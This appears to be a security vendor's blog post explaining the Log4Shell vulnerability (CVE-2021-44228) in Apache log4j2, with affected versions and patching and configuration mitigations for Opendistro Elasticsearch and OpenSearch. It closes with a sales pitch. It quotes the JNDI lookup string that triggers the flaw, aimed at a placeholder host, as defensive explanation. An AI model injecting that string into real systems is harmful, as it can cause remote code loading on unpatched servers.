Introduction

Log4shell or Log4j may be one of the most widespread cybersecurity vulnerabilities in recent years. The vulnerability is located on Apache log4j2 library. It is officially CVE-2021-44228 (CVE number is the unique number given to each vulnerability discovered). It first came to light on December 9th, although some reports say that the issue first surfaced on December 1st. Log4j was highlighted by Alibaba Cloud Security team’s, Chen Zhaojun.

Non-technical explanation

This  vulnerability was discovered in a piece of free, open source software called log4j. This software is used by thousands of enterprise websites and applications, and even government agencies, in order to perform essential  functions that most people don’t know of or can’t think about, such as logging information for use by the developers, for debugging, error handling and other purposes.

It provides a functionality that every application needs and as a result, the use of log4j is ubiquitous worldwide. Unfortunately, it seems that  log4j2 has a previously undiscovered security vulnerability, in which data sent to it through a website, containing a special sequence of characters, results in log4j automatically fetching or even executing additional software from an external website or application. If cyberattackers exploit this vulnerability, they can make the server which is running log4j run any desired software, including software that can completely take over the specific server. This is known as Remote Code Execution (RCE) attack.

The net result is that, if left unaddressed, cyberattackers can completely take over thousands of websites and online applications, allowing them to thieve money, data, and gain unauthorized access to systems. The security community has been completely focused on this vulnerability from it’s announcement date, December 9th, in order to mitigate this threat as soon as possible.

The Log4j exploit is further explained in the diagram below:

Log4j exploit

Technical Explanation

The vulnerability is based on the way that log messages are handled by the Log4j processor. Untrusted strings (e.x.  coming from input text forms) containing patterns like ${jndi:ldap://example.com/a} would trigger a remote class load, message lookup, and execution of the associated software . Successful exploitation of CVE-2021-44228 can lead a remote, unauthenticated attacker to take full control of the target system.

 

Affected Versions

According to Apache’s advisory for CVE-2021-44228, all Apache Log4j (version 2.x) versions up to 2.14.1 are vulnerable if message lookup substitution was enabled. The behavior that allows for exploitation of the flaw has been disabled by default starting in version 2.15.0.

Mitigation Strategies for Opendistro’s Elasticsearch and Opensearch

Mitigations are relatively easy to implement, but in the case of being left unmitigated or unpatched, the vulnerability is extremely easy to be exploited. Many popular vendors and webapps have been confirmed to be vulnerable so far, and it is likely to hear more about many other sites and apps being vulnerable in the forthcoming days.

Logstail team priority, was the mitigation of Opendistro’s 1.12.0 Elasticsearch, as well as Opensearch, which is written in Java and makes use out of the box of this particular vulnerable version of log4j2 library as per the official documentation.

It is important to mention that in Opendistro’s latest announcement, it is highlighted that the Remote Code Execution was not reproduced by their team.

Below are some mitigation measures. Logstail’s team highly recommends the upgrade to the latest versions as soon as possible:

1. Upgrade to the latest version of Opendistro 1.13.3, Opensearch 1.2.1 

For Opendistro, Amazon released a new version on December 10th,  which contains the patch for the Apache log4j Vulnerability https://opendistro.github.io/for-elasticsearch/blog/2021/12/update-to-1-13-3/

This patch removes the JndiLookup class from the Log4j classpath.

For Opensearch, the 1.2.1 patch version was released on December 11th.

According to the official announcement, this release updates Log4j to version 2.15.0 which is not affected by the vulnerability.

2. Disable the message Lookup in log4j2.properties (This solution does not fully mitigate the second vulnerability that was discovered and analyzed in our latest post)

For those that cannot upgrade to the latest versions another mitigation is provided below:

Under Elasticsearch’s configuration folder there is a file called log4j2.properties which is mainly used for the configuration of Elasticsearch’s logs. Logstail’s team proposes that the following line is added in order to mitigate the vulnerability:

log4j2.formatMsgNoLookups=true

And then restart the elasticsearch service or container.

The idea behind this measure is that by closing the log4j2 message Lookup feature, the java backend won’t attempt to fetch content from an LDAP, DNS or an RMI link anymore.

For those who cannot disable  the Log4j message Lookup functionality nor can update to Opendistro’s or Opensearch’s latest versions, there are some additional mitigation options in Log4j’s website: https://logging.apache.org/log4j/2.x/

Conclusion

Due to the increasing security incidents, it is now more critical than ever to adopt the most suitable cybersecurity solutions. Cyber attack incidents keep rising with the evolution of technology, and more attack techniques keep evolving and developed. As hackers constantly try to find new ways to compromise security systems, organizations with highly sensitive information have to re-evaluate their cybersecurity strategies.

Our cloud-hosted solution with advanced features brings the functionality of centralized monitoring to your hands. Convert your data into actionable insights and maximize the performance of your infrastructure. Get notified of potential problems and take the appropriate actions. Sign-up for a free demo in order to realize the power of Logstail!

Logstail will re-adjust the way you monitor your data and will help you get more meaningful insights of your technical or security logs, via prebuild dashboards and powerful graphs, and become always aware of all possible security issues.

In Logstail we are also offering the full range of services required to effectively mitigate cyber-attacks. Incident response and consulting, penetration testing, and red team operations, are altogether aiming to help our customers mitigate their cyber incidents. Contact us at sales@logstail.com. Get a tailored offer for your business or get a free consultation by our team of globally recognized security experts!

5 1 vote
Article Rating